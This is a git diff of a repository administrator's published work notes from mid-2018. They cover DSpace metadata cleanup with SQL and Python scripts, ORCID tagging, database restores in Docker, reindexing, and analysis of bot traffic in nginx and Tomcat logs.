      $ cat dspace/config/controlled-vocabularies/cg-creator-id.xml | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
      +
      $ cat dspace/config/controlled-vocabularies/cg-creator-id.xml | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
       1020
      -$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml MEL\ ORCID.json | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
      +$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml MEL\ ORCID.json | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
       1158
       
      • I combined the two lists and regenerated the names for all our ORCID iDs using my resolve-orcids.py script:
      -
      $ cat dspace/config/controlled-vocabularies/cg-creator-id.xml MEL\ ORCID.json | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2018-07-15-orcid-ids.txt
      +
      $ cat dspace/config/controlled-vocabularies/cg-creator-id.xml MEL\ ORCID.json | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2018-07-15-orcid-ids.txt
       $ ./resolve-orcids.py -i /tmp/2018-07-15-orcid-ids.txt -o /tmp/2018-07-15-resolved-orcids.txt -d
       
      • Then I added the XML formatting for controlled vocabularies, sorted the list with GNU sort in vim via % !sort and then checked the formatting with tidy:
      • @@ -465,16 +465,16 @@ $ ./resolve-orcids.py -i /tmp/2018-07-15-orcid-ids.txt -o /tmp/2018-07-15-resolv
      • For every day in the past week I only see about 50 to 100 requests per day, but then about nine days ago I see 1500 requests
      • In there I see two bots making about 750 requests each, and this one is probably Altmetric:
      -
      178.33.237.157 - - [09/Jul/2018:17:00:46 +0000] "GET /oai/request?verb=ListRecords&resumptionToken=oai_dc////100 HTTP/1.1" 200 58653 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_121)"
      -178.33.237.157 - - [09/Jul/2018:17:01:11 +0000] "GET /oai/request?verb=ListRecords&resumptionToken=oai_dc////200 HTTP/1.1" 200 67950 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_121)"
      +
      178.33.237.157 - - [09/Jul/2018:17:00:46 +0000] "GET /oai/request?verb=ListRecords&resumptionToken=oai_dc////100 HTTP/1.1" 200 58653 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_121)"
      +178.33.237.157 - - [09/Jul/2018:17:01:11 +0000] "GET /oai/request?verb=ListRecords&resumptionToken=oai_dc////200 HTTP/1.1" 200 67950 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_121)"
       ...
      -178.33.237.157 - - [09/Jul/2018:22:10:39 +0000] "GET /oai/request?verb=ListRecords&resumptionToken=oai_dc////73900 HTTP/1.1" 20 0 25049 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_121)"
      +178.33.237.157 - - [09/Jul/2018:22:10:39 +0000] "GET /oai/request?verb=ListRecords&resumptionToken=oai_dc////73900 HTTP/1.1" 20 0 25049 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_121)"
       
      • So if they are getting 100 records per OAI request it would take them 739 requests
      • I wonder if I should add this user agent to the Tomcat Crawler Session Manager valve… does OAI use Tomcat sessions?
      • Appears not:
      -
      $ http --print Hh 'https://cgspace.cgiar.org/oai/request?verb=ListRecords&resumptionToken=oai_dc////100'
      +
      $ http --print Hh 'https://cgspace.cgiar.org/oai/request?verb=ListRecords&resumptionToken=oai_dc////100'
       GET /oai/request?verb=ListRecords&resumptionToken=oai_dc////100 HTTP/1.1
       Accept: */*
       Accept-Encoding: gzip, deflate
      @@ -523,17 +523,17 @@ X-XSS-Protection: 1; mode=block
       
    • Still discussing dates with IWMI
    • I looked in the database to see the breakdown of date formats used in dc.date.issued, ie YYYY, YYYY-MM, or YYYY-MM-DD:
    -
    dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=15 and text_value ~ '^[0-9]{4}$';
    +
    dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=15 and text_value ~ '^[0-9]{4}$';
      count
     -------
      53292
     (1 row)
    -dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=15 and text_value ~ '^[0-9]{4}-[0-9]{2}$';
    +dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=15 and text_value ~ '^[0-9]{4}-[0-9]{2}$';
      count
     -------
       3818
     (1 row)
    -dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=15 and text_value ~ '^[0-9]{4}-[0-9]{2}-[0-9]{2}$';
    +dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=15 and text_value ~ '^[0-9]{4}-[0-9]{2}-[0-9]{2}$';
      count
     -------
      17357
    diff --git a/docs/2018-08/index.html b/docs/2018-08/index.html
    index 63ad7efdd..a809b7242 100644
    --- a/docs/2018-08/index.html
    +++ b/docs/2018-08/index.html
    @@ -46,7 +46,7 @@ Anyways, perhaps I should increase the JVM heap from 5120m to 6144m like we did
     The server only has 8GB of RAM so we’ll eventually need to upgrade to a larger one because we’ll start starving the OS, PostgreSQL, and command line batch processes
     I ran all system updates on DSpace Test and rebooted it
     "/>
    -
    +
     
     
         
    @@ -179,13 +179,13 @@ I ran all system updates on DSpace Test and rebooted it
     
  • I did some quick sanity checks and small cleanups in Open Refine, checking for spaces, weird accents, and encoding errors
  • Finally I did a test run with the fix-metadata-values.py script:
  • -
    $ ./fix-metadata-values.py -i 2018-08-15-Correct-1083-Affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -t correct -m 211
    -$ ./delete-metadata-values.py -i 2018-08-15-Remove-11-Affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211
    +
    $ ./fix-metadata-values.py -i 2018-08-15-Correct-1083-Affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -t correct -m 211
    +$ ./delete-metadata-values.py -i 2018-08-15-Remove-11-Affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211
     

    2018-08-16

    • Generate a list of the top 1,500 authors on CGSpace for Sisay so he can create the controlled vocabulary:
    -
    dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc limit 1500) to /tmp/2018-08-16-top-1500-authors.csv with csv; 
    +
    dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc limit 1500) to /tmp/2018-08-16-top-1500-authors.csv with csv; 
     
    • Start working on adding the ORCID metadata to a handful of CIAT authors as requested by Elizabeth earlier this month
    • I might need to overhaul the add-orcid-identifiers-csv.py script to be a little more robust about author order and ORCID metadata that might have been altered manually by editors after submission, as this script was written without that consideration
    • @@ -198,14 +198,14 @@ $ ./delete-metadata-values.py -i 2018-08-15-Remove-11-Affiliations.csv -db dspac
      $ sudo docker run --name dspacedb -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
       $ createuser -h localhost -U postgres --pwprompt dspacetest
       $ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
      -$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
      +$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
       $ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest ~/Downloads/cgspace_2018-08-16.backup
      -$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
      +$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
       $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
       

      2018-08-19

      • Keep working on the CIAT ORCID identifiers from Elizabeth
      • -
      • In the spreadsheet she sent me there are some names with other versions in the database, so when it is obviously the same one (ie “Schultze-Kraft, Rainer” and “Schultze-Kraft, R.") I will just tag them with ORCID identifiers too
      • +
      • In the spreadsheet she sent me there are some names with other versions in the database, so when it is obviously the same one (ie “Schultze-Kraft, Rainer” and “Schultze-Kraft, R.”) I will just tag them with ORCID identifiers too
      • This is less obvious and more error prone with names like “Peters” where there are many more authors
      • I see some errors in the variations of names as well, for example:
      @@ -221,37 +221,37 @@ Verchot, Louis V.
    • In the end, I’ll run the following CSV with my add-orcid-identifiers-csv.py script:
    dc.contributor.author,cg.creator.id
    -"Campbell, Bruce",Bruce M Campbell: 0000-0002-0123-4859
    -"Campbell, Bruce M.",Bruce M Campbell: 0000-0002-0123-4859
    -"Campbell, B.M",Bruce M Campbell: 0000-0002-0123-4859
    -"Peters, Michael",Michael Peters: 0000-0003-4237-3916
    -"Peters, M.",Michael Peters: 0000-0003-4237-3916
    -"Peters, M.K.",Michael Peters: 0000-0003-4237-3916
    -"Tamene, Lulseged",Lulseged Tamene: 0000-0002-3806-8890
    -"Desta, Lulseged Tamene",Lulseged Tamene: 0000-0002-3806-8890
    -"Läderach, Peter",Peter Läderach: 0000-0001-8708-6318
    -"Lundy, Mark",Mark Lundy: 0000-0002-5241-3777
    -"Schultze-Kraft, Rainer",Rainer Schultze-Kraft: 0000-0002-4563-0044
    -"Schultze-Kraft, R.",Rainer Schultze-Kraft: 0000-0002-4563-0044
    -"Verchot, Louis",Louis Verchot: 0000-0001-8309-6754
    -"Verchot, L",Louis Verchot: 0000-0001-8309-6754
    -"Verchot, L. V.",Louis Verchot: 0000-0001-8309-6754
    -"Verchot, L.V",Louis Verchot: 0000-0001-8309-6754
    -"Verchot, L.V.",Louis Verchot: 0000-0001-8309-6754
    -"Verchot, LV",Louis Verchot: 0000-0001-8309-6754
    -"Verchot, Louis V.",Louis Verchot: 0000-0001-8309-6754
    -"Mukankusi, Clare",Clare Mukankusi: 0000-0001-7837-4545
    -"Mukankusi, Clare M.",Clare Mukankusi: 0000-0001-7837-4545
    -"Wyckhuys, Kris",Kris Wyckhuys: 0000-0003-0922-488X
    -"Wyckhuys, Kris A. G.",Kris Wyckhuys: 0000-0003-0922-488X
    -"Wyckhuys, Kris A.G.",Kris Wyckhuys: 0000-0003-0922-488X
    -"Chirinda, Ngonidzashe",Ngonidzashe Chirinda: 0000-0002-4213-6294
    -"Chirinda, Ngoni",Ngonidzashe Chirinda: 0000-0002-4213-6294
    -"Ngonidzashe, Chirinda",Ngonidzashe Chirinda: 0000-0002-4213-6294
    +"Campbell, Bruce",Bruce M Campbell: 0000-0002-0123-4859
    +"Campbell, Bruce M.",Bruce M Campbell: 0000-0002-0123-4859
    +"Campbell, B.M",Bruce M Campbell: 0000-0002-0123-4859
    +"Peters, Michael",Michael Peters: 0000-0003-4237-3916
    +"Peters, M.",Michael Peters: 0000-0003-4237-3916
    +"Peters, M.K.",Michael Peters: 0000-0003-4237-3916
    +"Tamene, Lulseged",Lulseged Tamene: 0000-0002-3806-8890
    +"Desta, Lulseged Tamene",Lulseged Tamene: 0000-0002-3806-8890
    +"Läderach, Peter",Peter Läderach: 0000-0001-8708-6318
    +"Lundy, Mark",Mark Lundy: 0000-0002-5241-3777
    +"Schultze-Kraft, Rainer",Rainer Schultze-Kraft: 0000-0002-4563-0044
    +"Schultze-Kraft, R.",Rainer Schultze-Kraft: 0000-0002-4563-0044
    +"Verchot, Louis",Louis Verchot: 0000-0001-8309-6754
    +"Verchot, L",Louis Verchot: 0000-0001-8309-6754
    +"Verchot, L. V.",Louis Verchot: 0000-0001-8309-6754
    +"Verchot, L.V",Louis Verchot: 0000-0001-8309-6754
    +"Verchot, L.V.",Louis Verchot: 0000-0001-8309-6754
    +"Verchot, LV",Louis Verchot: 0000-0001-8309-6754
    +"Verchot, Louis V.",Louis Verchot: 0000-0001-8309-6754
    +"Mukankusi, Clare",Clare Mukankusi: 0000-0001-7837-4545
    +"Mukankusi, Clare M.",Clare Mukankusi: 0000-0001-7837-4545
    +"Wyckhuys, Kris",Kris Wyckhuys: 0000-0003-0922-488X
    +"Wyckhuys, Kris A. G.",Kris Wyckhuys: 0000-0003-0922-488X
    +"Wyckhuys, Kris A.G.",Kris Wyckhuys: 0000-0003-0922-488X
    +"Chirinda, Ngonidzashe",Ngonidzashe Chirinda: 0000-0002-4213-6294
    +"Chirinda, Ngoni",Ngonidzashe Chirinda: 0000-0002-4213-6294
    +"Ngonidzashe, Chirinda",Ngonidzashe Chirinda: 0000-0002-4213-6294
     
    • The invocation would be:
    -
    $ ./add-orcid-identifiers-csv.py -i 2018-08-16-ciat-orcid.csv -db dspace -u dspace -p 'fuuu'
    +
    $ ./add-orcid-identifiers-csv.py -i 2018-08-16-ciat-orcid.csv -db dspace -u dspace -p 'fuuu'
     
    • I ran the script on DSpace Test and CGSpace and tagged a total of 986 ORCID identifiers
    • Looking at the list of author affiliations from Peter one last time
    • @@ -268,12 +268,12 @@ Verchot, Louis V.
    • This character all by itself is indicative of encoding issues in French, Italian, and Spanish names, for example: De´veloppement and Investigacio´n
    • I will run the following on DSpace Test and CGSpace:
    -
    $ ./fix-metadata-values.py -i /tmp/2018-08-15-Correct-1083-Affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -t correct -m 211
    -$ ./delete-metadata-values.py -i /tmp/2018-08-15-Remove-11-Affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211
    +
    $ ./fix-metadata-values.py -i /tmp/2018-08-15-Correct-1083-Affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -t correct -m 211
    +$ ./delete-metadata-values.py -i /tmp/2018-08-15-Remove-11-Affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211
     
    • Then force an update of the Discovery index on DSpace Test:
    -
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m"
    +
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m"
     $ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
     
     real    72m12.570s
    @@ -282,7 +282,7 @@ sys     2m2.461s
     
    • And then on CGSpace:
    -
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
    +
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
     $ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
     
     real    79m44.392s
    @@ -292,9 +292,9 @@ sys     2m20.248s
     
  • Run system updates on DSpace Test and reboot the server
  • In unrelated news, I see some newish Russian bot making a few thousand requests per day and not re-using its XMLUI session:
  • -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep '19/Aug/2018' | grep -c 5.9.6.51
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep '19/Aug/2018' | grep -c 5.9.6.51
     1553
    -# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51' dspace.log.2018-08-19
    +# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51' dspace.log.2018-08-19
     1724
     
    • I don’t even know how it’s possible for the bot to use MORE sessions than total requests…
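One possible explanation, offered as an assumption rather than a diagnosis: `grep -c` counts matching log lines, not distinct session IDs, so if a single request writes more than one line to dspace.log the count can exceed the number of requests. The sketch below separates the two numbers. The helper `session_stats` and the simplified log lines are hypothetical; only the `session_id=...:ip_addr=...` fragment comes from the grep pattern above.

```python
import re


def session_stats(lines, ip):
    """Return (matching_lines, distinct_sessions) for one client IP."""
    # re.escape() keeps the dots literal, and the lookahead stops
    # 5.9.6.51 from also matching addresses such as 5.9.6.512.
    pattern = re.compile(
        r"session_id=([A-Z0-9]{32}):ip_addr=" + re.escape(ip) + r"(?!\d)"
    )
    matching_lines = 0
    sessions = set()
    for line in lines:
        found = pattern.findall(line)
        if found:
            matching_lines += 1  # this is what grep -c reports
            sessions.update(found)  # this is the number of real sessions
    return matching_lines, len(sessions)


# Hypothetical, simplified log lines for illustration only.
s1, s2 = "A" * 32, "B" * 32
sample_lines = [
    f"INFO session_id={s1}:ip_addr=5.9.6.51:view_item",
    f"INFO session_id={s1}:ip_addr=5.9.6.51:view_bitstream",
    f"INFO session_id={s2}:ip_addr=5.9.6.51:view_item",
    f"INFO session_id={s2}:ip_addr=5.9.6.512:view_item",
]

print(session_stats(sample_lines, "5.9.6.51"))
```

If the distinct count turns out much lower than the line count, the bot may be re-using sessions more than the `grep -c` figure suggests.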
    • @@ -391,11 +391,11 @@ $ dspace database migrate ignored
    • I exported a list of items from Listings and Reports with the following criteria: from year 2013 until now, have WLE subject GENDER or GENDER POVERTY AND INSTITUTIONS, and CRP Water, Land and Ecosystems
    • Then I extracted the Handle links from the report so I could export each item’s metadata as CSV
    -
    $ grep -o -E "[0-9]{5}/[0-9]{0,5}" listings-export.txt > /tmp/iwmi-gender-items.txt
    +
    $ grep -o -E "[0-9]{5}/[0-9]{0,5}" listings-export.txt > /tmp/iwmi-gender-items.txt
     
    • Then on the DSpace server I exported the metadata for each item one by one:
    -
    $ while read -r line; do dspace metadata-export -f "/tmp/${line/\//-}.csv" -i $line; sleep 2; done < /tmp/iwmi-gender-items.txt
    +
    $ while read -r line; do dspace metadata-export -f "/tmp/${line/\//-}.csv" -i $line; sleep 2; done < /tmp/iwmi-gender-items.txt
     
    • But from here I realized that each of the fifty-nine items will have different columns in their CSVs, making it difficult to combine them
    • I’m not sure how to proceed without writing some script to parse and join the CSVs, and I don’t think it’s worth my time
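For reference, the kind of script mentioned above could be fairly small. This is a minimal sketch, assuming the per-item exports are ordinary CSV files with a header row; the function names and the sample column names are hypothetical, and real DSpace exports may need extra handling (for example language qualifiers in column names).

```python
import csv
import io


def merge_csvs(sources):
    """Read CSVs with differing headers; return (combined_header, rows)."""
    fieldnames = []
    rows = []
    for source in sources:
        reader = csv.DictReader(source)
        # Keep the first-seen order of columns across all files.
        for name in reader.fieldnames or []:
            if name not in fieldnames:
                fieldnames.append(name)
        rows.extend(reader)
    return fieldnames, rows


def write_merged(fieldnames, rows, out):
    """Write all rows under the combined header, leaving missing cells empty."""
    writer = csv.DictWriter(out, fieldnames=fieldnames, restval="")
    writer.writeheader()
    writer.writerows(rows)


# Hypothetical stand-ins for two of the exported files.
first = io.StringIO("id,collection,dc.title\n1,10568/1,First\n")
second = io.StringIO("id,collection,dc.subject\n2,10568/1,GENDER\n")

merged_header, merged_rows = merge_csvs([first, second])
merged_out = io.StringIO()
write_merged(merged_header, merged_rows, merged_out)
print(merged_out.getvalue())
```

In practice the `sources` would be open file handles for the files written by the `while read` loop, opened with `newline=""` as the `csv` module recommends.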
    diff --git a/docs/2018-09/index.html b/docs/2018-09/index.html
    index ddeae4917..a0aedf728 100644
    --- a/docs/2018-09/index.html
    +++ b/docs/2018-09/index.html
    @@ -30,7 +30,7 @@ I’ll update the DSpace role in our Ansible infrastructure playbooks and ru
     Also, I’ll re-run the postgresql tasks because the custom PostgreSQL variables are dynamic according to the system’s RAM, and we never re-ran them after migrating to larger Linodes last month
     I’m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I’m getting those autowire errors in Tomcat 8.5.30 again:
     "/>
    -
    +
    @@ -124,7 +124,7 @@ I’m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I
    • I’m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I’m getting those autowire errors in Tomcat 8.5.30 again:
    02-Sep-2018 11:18:52.678 SEVERE [localhost-startStop-1] org.apache.catalina.core.StandardContext.listenerStart Exception sending context initialized event to listener instance of class [org.dspace.servicemanager.servlet.DSpaceKernelServletContextListener]
    - java.lang.RuntimeException: Failure during filter init: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'conversionService' defined in file [/home/dspacetest.cgiar.org/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2' of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property 'converters' with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations: {@org.springframework.beans.factory.annotation.Autowired(required=true)}
    + java.lang.RuntimeException: Failure during filter init: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'conversionService' defined in file [/home/dspacetest.cgiar.org/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2' of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property 'converters' with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations: {@org.springframework.beans.factory.annotation.Autowired(required=true)}
         at org.dspace.servicemanager.servlet.DSpaceKernelServletContextListener.contextInitialized(DSpaceKernelServletContextListener.java:92)
         at org.apache.catalina.core.StandardContext.listenerStart(StandardContext.java:4776)
         at org.apache.catalina.core.StandardContext.startInternal(StandardContext.java:5240)
    @@ -139,7 +139,7 @@ I’m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I
         at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
         at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
         at java.lang.Thread.run(Thread.java:748)
    -Caused by: java.lang.RuntimeException: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'conversionService' defined in file [/home/dspacetest.cgiar.org/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2' of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property 'converters' with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations:
    +Caused by: java.lang.RuntimeException: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'conversionService' defined in file [/home/dspacetest.cgiar.org/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2' of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property 'converters' with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations:
     
    • Full log here: https://gist.github.com/alanorth/1e4ae567b853fea9d9dbf1a030ecd8c2
    • XMLUI fails to load, but REST, Solr, JSPUI, etc. work
    • @@ -191,13 +191,13 @@ requests: method: GET url: https://dspacetest.cgiar.org/rest/test validate: - raw: "REST api is running." + raw: "REST api is running." login: url: https://dspacetest.cgiar.org/rest/login method: POST data: - json: {"email":"test@dspace","password":"thepass"} + json: {"email":"test@dspace","password":"thepass"} status: url: https://dspacetest.cgiar.org/rest/status @@ -229,15 +229,15 @@ $ dspace community-filiator --set -p 10568/97114 -c 10568/3112
    • Valerio contacted me to point out some issues with metadata on CGSpace, which I corrected in PostgreSQL:
    -
    update metadatavalue set text_value='ISI Journal' where resource_type_id=2 and metadata_field_id=226 and text_value='ISI Juornal';
    +
    update metadatavalue set text_value='ISI Journal' where resource_type_id=2 and metadata_field_id=226 and text_value='ISI Juornal';
     UPDATE 1
    -update metadatavalue set text_value='ISI Journal' where resource_type_id=2 and metadata_field_id=226 and text_value='ISI journal';
    +update metadatavalue set text_value='ISI Journal' where resource_type_id=2 and metadata_field_id=226 and text_value='ISI journal';
     UPDATE 23
    -update metadatavalue set text_value='ISI Journal' where resource_type_id=2 and metadata_field_id=226 and text_value='YES';
    +update metadatavalue set text_value='ISI Journal' where resource_type_id=2 and metadata_field_id=226 and text_value='YES';
     UPDATE 1
    -delete from metadatavalue where resource_type_id=2 and metadata_field_id=226 and text_value='NO';
    +delete from metadatavalue where resource_type_id=2 and metadata_field_id=226 and text_value='NO';
     DELETE 17
    -update metadatavalue set text_value='ISI Journal' where resource_type_id=2 and metadata_field_id=226 and text_value='ISI';
    +update metadatavalue set text_value='ISI Journal' where resource_type_id=2 and metadata_field_id=226 and text_value='ISI';
     UPDATE 15
     
    • Start working on adding metadata for access and usage rights that we started earlier in 2018 (and also in 2017)
    • @@ -246,7 +246,7 @@ UPDATE 15
    • Linode said that CGSpace (linode18) had a high CPU load earlier today
    • When I looked, I saw it was the same Russian IP that I noticed last month:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "10/Sep/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "10/Sep/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
        1459 157.55.39.202
        1579 95.108.181.88
        1615 157.55.39.147
    @@ -260,7 +260,7 @@ UPDATE 15
     
    • And this bot is still creating more Tomcat sessions than Nginx requests (WTF?):
    -
    # grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51' dspace.log.2018-09-10 
    +
    # grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51' dspace.log.2018-09-10 
     14133
     
    • The user agent is still the same:
    • @@ -270,7 +270,7 @@ UPDATE 15
    • I added .*crawl.* to the Tomcat Session Crawler Manager Valve, so I’m not sure why the bot is creating so many sessions…
    • I just tested that user agent on CGSpace and it does not create a new session:
    -
    $ http --print Hh https://cgspace.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'
    +
    $ http --print Hh https://cgspace.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'
     GET / HTTP/1.1
     Accept: */*
     Accept-Encoding: gzip, deflate
    @@ -319,7 +319,7 @@ $ sudo docker run --name dspacedb -v dspacetest_data:/var/lib/postgresql/data -e
     
  • Linode says that CGSpace (linode18) has had high CPU for the past two hours
  • The top IP addresses today are:
  • -
    # zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E "13/Sep/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10                                                                                                
    +
    # zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E "13/Sep/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10                                                                                                
          32 46.229.161.131
          38 104.198.9.108
          39 66.249.64.91
    @@ -333,9 +333,9 @@ $ sudo docker run --name dspacedb -v dspacetest_data:/var/lib/postgresql/data -e
     
    • And the top two addresses seem to be re-using their Tomcat sessions properly:
    -
